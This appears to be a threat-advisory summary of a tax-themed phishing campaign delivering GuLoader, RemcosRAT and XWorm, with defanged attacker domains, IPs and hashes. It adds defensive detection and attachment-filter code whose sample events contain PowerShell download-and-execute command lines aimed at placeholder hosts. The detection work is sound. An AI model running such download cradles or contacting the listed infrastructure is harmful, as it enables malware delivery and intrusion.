Increase in Tax-Themed Email Lure

eSentire observed a surge in tax-themed phishing emails delivering loaders and Java-based RATs—notably GuLoader (leading to RemcosRAT), XWorm, RattyRat, and SorillusRAT—via links to password-protected ZIPs, malicious .jar/.js/.vbs files, and LNK artifacts that execute PowerShell and in-memory payloads. The advisory details attack chains, observed C2s/hosting URLs and hashes, and recommends technical mitigations including EDR/NGAV, blocking risky attachments/URLs, and configuration changes. #GuLoader #RemcosRAT #XWorm #RattyRat #SorillusRAT #eSentire

Keypoints

  • Attackers used tax-themed phishing emails with links to password-protected ZIP archives that impersonate tax documents.
  • ZIP archives contained LNK files or JavaScript/Java artifacts which, when executed, deployed GuLoader, XWorm, RattyRat, or SorillusRAT.
  • GuLoader execution triggered PowerShell commands, established persistence via Registry Run Keys, and injected RemcosRAT into legitimate process memory.
  • XWorm and other RATs retrieved payloads from remote C2 servers over HTTP(S); in at least one incident the client's endpoint agent blocked the follow-on JavaScript and PowerShell activity.
  • Observed IOCs include multiple phishing domains, hosting URLs, file hashes for LNK/VBS/JAR/ZIP, and C2 IPs/domains (examples listed below).
  • Recommended defenses: up-to-date AV signatures, NGAV/EDR, block password-protected ZIPs and .jar attachments/URLs, remove Java where unnecessary, apply “Open With” mitigations for .jar and script files, and enforce MFA.

MITRE Techniques

  • [T1566.001] Spearphishing Link – Phishing emails delivered links to payloads and ZIP archives: (‘tax-themed malicious emails which contain a link to a password protected ZIP archive that impersonates a tax return’)
  • [T1204.002] User Execution: Malicious File – Users interacting with LNK, .jar, .js or .vbs led to execution: (‘The ZIP archive contains an LNK file, which if interacted with, leads to the deployment of GuLoader’)
  • [T1105] Ingress Tool Transfer – Downloading of payloads from attacker-hosted URLs to victim systems: (‘a link to a password protected ZIP archive … The ZIP archive contains an LNK file … leads to the deployment of GuLoader’)
  • [T1059.001] Command and Scripting Interpreter: PowerShell – GuLoader and observed droppers executed PowerShell commands to retrieve and launch payloads: (‘GuLoader is then launched resulting in the execution of PowerShell commands’)
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys and Startup Folder – Persistence established via registry run keys: (‘establishing persistence via Registry Run Keys’)
  • [T1055] Process Injection – RemcosRAT was injected into the memory of a legitimate process after loader execution: (‘the RemcosRAT payload is injected into the memory of a legitimate process’)
  • [T1071.001] Application Layer Protocol: Web Protocols – C2 and payload retrieval performed over HTTP/HTTPS to attacker-controlled domains and IPs: (‘retrieve the XWorm payload from its Command-and-Control (C2) server’)

Indicators of Compromise

  • [Phishing Email Domains] domains used to deliver lures – intuitfrauddept[.]com, intermountaiinhealthcare[.]org, and 2 more domains
  • [Payload Hosting URLs] hosting locations for GuLoader/XWorm/Sorillus/Ratty payloads – hxxps://trivolibolit[.]com/wp-content/Hpzion[.]png, hxxps://sahiomn[.]web[.]app/Tax_documents_PDF[.]zip, and other hosting URLs
  • [C2 Domains] command-and-control domains observed – zarusouyt2994hesut01[.]duckdns[.]org, 1shanamubunz[.]com, and 2 more C2 domains
  • [IP Addresses] C2 and payload hosts – 85.209.176[.]69, 91.92.243[.]28, 185.196.220[.]62
  • [File Hashes] hashes for LNK/VBS/JAR/ZIP artifacts – AA55DC4FBEE738D2EAA714E6136C4E0CE8E3EF99…, 1C56940B0234BF7BEAC519CB62BD0DBE1E1B96B6…, and 7 more hashes

Attack chains observed follow a repeatable technical pattern: recipients receive tax-themed emails pointing to attacker-hosted links or password-protected ZIP files. Those ZIPs commonly contain LNK shortcuts or JavaScript/Java artifacts; when the LNK or script is executed by the user, it launches GuLoader or drops other RAT installers. GuLoader variants execute PowerShell to retrieve additional components, create persistence via Registry Run Keys, and perform process injection to load RemcosRAT into a legitimate process’s memory, enabling remote control and data exfiltration.

Other variants use JavaScript or .jar files to spawn PowerShell commands that fetch XWorm or Java RAT payloads from hardcoded C2 URLs/IPs; in at least one case, the client’s endpoint agent blocked subsequent JavaScript and PowerShell activity. Observed capabilities across RemcosRAT, XWorm, RattyRat, and SorillusRAT include keylogging, screenshots, audio/webcam capture, file transfer, and remote command execution.
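The chain above (user-launched LNK, script or Java artifact spawning PowerShell with a download cradle, then a Run-key write for persistence) can be checked for in endpoint telemetry. The following is an added example, not code from the eSentire advisory: it runs two simple detection rules over constructed Sysmon-style events (process creation and registry value set). The event values, paths, SID and URLs are made up for the example and are not IOCs from the advisory.

```python
import re
from dataclasses import dataclass

# Constructed sample events in a Sysmon-like shape (Event ID 1 = process
# create, Event ID 13 = registry value set). Paths, URLs and SID are made up.
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -ep bypass -c \"(New-Object Net.WebClient)"
                    ".DownloadString('https://example.invalid/stage2.ps1') | iex\""},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"},
    {"EventID": 1, "ParentImage": r"C:\Program Files\Java\bin\javaw.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c powershell Invoke-WebRequest https://example.invalid/x.jar -OutFile %TEMP%\x.jar"},
    {"EventID": 13, "Image": r"C:\Users\u\AppData\Local\Temp\dropper.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\u\AppData\Roaming\Updater\updater.vbs"},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe notes.txt"},
]

# Parents typical of a user double-clicking an LNK (explorer.exe), a .js/.vbs
# (wscript/cscript) or a .jar (java/javaw). explorer.exe also launches plenty of
# legitimate shortcuts, so the rule additionally requires a cradle or obfuscation.
SCRIPT_PARENTS = {"explorer.exe", "wscript.exe", "cscript.exe",
                  "java.exe", "javaw.exe", "cmd.exe"}
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|"
    r"start-bitstransfer|\bcurl\b", re.I)
OBFUSCATION = re.compile(
    r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|-w(indowstyle)?\s+hidden|"
    r"-ep\s+bypass|-executionpolicy\s+bypass", re.I)
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)


@dataclass
class Finding:
    technique: str   # MITRE ATT&CK technique ID the rule maps to
    reason: str
    event: dict


def _basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower()


def analyze(events):
    """Return a Finding for every event matching one of the two rules."""
    findings = []
    for ev in events:
        if ev.get("EventID") == 1:
            child = _basename(ev.get("Image", ""))
            parent = _basename(ev.get("ParentImage", ""))
            cmd = ev.get("CommandLine", "")
            # Rule 1: script/LNK/Java parent -> PowerShell with a download
            # cradle or hidden/encoded/bypass flags (T1059.001, T1105).
            is_powershell = child in ("powershell.exe", "pwsh.exe") or "powershell" in cmd.lower()
            if is_powershell and parent in SCRIPT_PARENTS and (
                    DOWNLOAD_CRADLE.search(cmd) or OBFUSCATION.search(cmd)):
                findings.append(Finding(
                    "T1059.001",
                    f"{parent} spawned PowerShell with download cradle or obfuscation flags",
                    ev))
        elif ev.get("EventID") == 13:
            # Rule 2: any value written under a Run/RunOnce key (T1547.001).
            if RUN_KEY.search(ev.get("TargetObject", "")):
                findings.append(Finding(
                    "T1547.001",
                    f"Run key value written by {_basename(ev.get('Image', ''))}",
                    ev))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f.technique, "-", f.reason)
```

On the sample set this flags the three PowerShell launches (from explorer.exe, wscript.exe and javaw.exe) and the Run-key write, and ignores the notepad launch. In production the same two rules are usually expressed as EDR or SIEM queries; the point of the combination is that a PowerShell download cradle whose parent is a script host or Java, followed by a Run-key write, reproduces the GuLoader and XWorm chains described above without relying on the specific hashes or domains from this campaign.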

Mitigations focused on the technical attack path include: block password-protected ZIPs and .jar attachments/URLs at the email boundary; deploy NGAV/EDR with detection for malicious PowerShell, script execution, and process injection; keep AV signatures current; restrict or remove Java where not needed; implement “Open With” policy changes so .jar and script files open with a text editor; and enforce MFA to reduce the impact of credential theft.
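The first mitigation listed, blocking password-protected ZIPs and .jar attachments at the email boundary, comes down to a small inspection step before an attachment is released to the user. The following is an added example, not code from the advisory or from eSentire: it checks an attachment by extension, and for ZIP archives inspects each entry's encryption flag and file type without needing the password. The sample archives are constructed in the block; because Python's zipfile module cannot write encrypted archives, the "password-protected" sample is produced by setting the encryption flag bit in an ordinary ZIP, which is all the check reads.

```python
import io
import struct
import zipfile

# File types the advisory recommends blocking or re-associating, plus the usual
# script/executable types that ride in the same lures.
RISKY_EXTENSIONS = {".lnk", ".jar", ".js", ".jse", ".vbs", ".vbe", ".wsf",
                    ".hta", ".exe", ".scr", ".ps1", ".bat", ".cmd"}
DOCUMENT_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx"}
ZIP_ENCRYPTED_FLAG = 0x1   # general-purpose bit 0 of a ZIP entry header


def _extension(name: str) -> str:
    lower = name.lower()
    return "." + lower.rsplit(".", 1)[-1] if "." in lower else ""


def assess_attachment(filename: str, data: bytes):
    """Return a list of reasons to block the attachment (empty list = allow)."""
    reasons = []
    ext = _extension(filename)
    if ext in RISKY_EXTENSIONS:
        return [f"{filename}: risky attachment type {ext}"]
    if ext != ".zip":
        return reasons
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return [f"{filename}: not a valid ZIP archive"]
    for info in zf.infolist():
        if info.is_dir():
            continue
        name = info.filename
        entry_ext = _extension(name)
        # Encrypted entries cannot be scanned by the gateway, which is exactly
        # why the lure uses them; the flag is readable without the password.
        if info.flag_bits & ZIP_ENCRYPTED_FLAG:
            reasons.append(f"{name}: entry is password-protected and cannot be scanned")
        if entry_ext in RISKY_EXTENSIONS:
            reasons.append(f"{name}: risky file type {entry_ext}")
        parts = name.lower().split(".")
        if len(parts) >= 3 and "." + parts[-2] in DOCUMENT_EXTENSIONS and entry_ext in RISKY_EXTENSIONS:
            reasons.append(f"{name}: document extension spoofing ({'.' + parts[-2]}{entry_ext})")
        if entry_ext == ".zip":
            reasons.append(f"{name}: nested archive")
    return reasons


def build_zip(entries: dict) -> bytes:
    """Construct an in-memory ZIP from {name: text} for the samples below."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def mark_encrypted(zip_bytes: bytes) -> bytes:
    """Set the encryption flag in every local (PK\\x03\\x04) and central
    directory (PK\\x01\\x02) header. Data stays plaintext; this only simulates
    the metadata a password-protected archive carries."""
    data = bytearray(zip_bytes)
    for sig, flag_offset in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
        pos = data.find(sig)
        while pos != -1:
            off = pos + flag_offset
            flags = struct.unpack_from("<H", data, off)[0] | ZIP_ENCRYPTED_FLAG
            struct.pack_into("<H", data, off, flags)
            pos = data.find(sig, pos + 4)
    return bytes(data)


# Constructed samples: a lure-shaped archive and a benign one.
SAMPLE_TAX_LURE = mark_encrypted(build_zip(
    {"Tax_Return_2024.pdf.lnk": "constructed placeholder text, not a real shortcut"}))
SAMPLE_BENIGN = build_zip({"receipts/january.csv": "date,amount\n2024-01-05,12.50\n"})

if __name__ == "__main__":
    for name, blob in (("Tax_documents.zip", SAMPLE_TAX_LURE), ("receipts.zip", SAMPLE_BENIGN)):
        print(name, "->", assess_attachment(name, blob) or "allow")
```

The lure sample is rejected on three counts (encrypted entry, .lnk inside, and a .pdf.lnk double extension), while the CSV archive passes. A direct .jar or .vbs attachment is rejected by extension before the archive logic runs, which matches the advisory's recommendation to block those types outright rather than rely on content scanning.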

Read more: https://www.esentire.com/security-advisories/increase-in-tax-themed-email-lure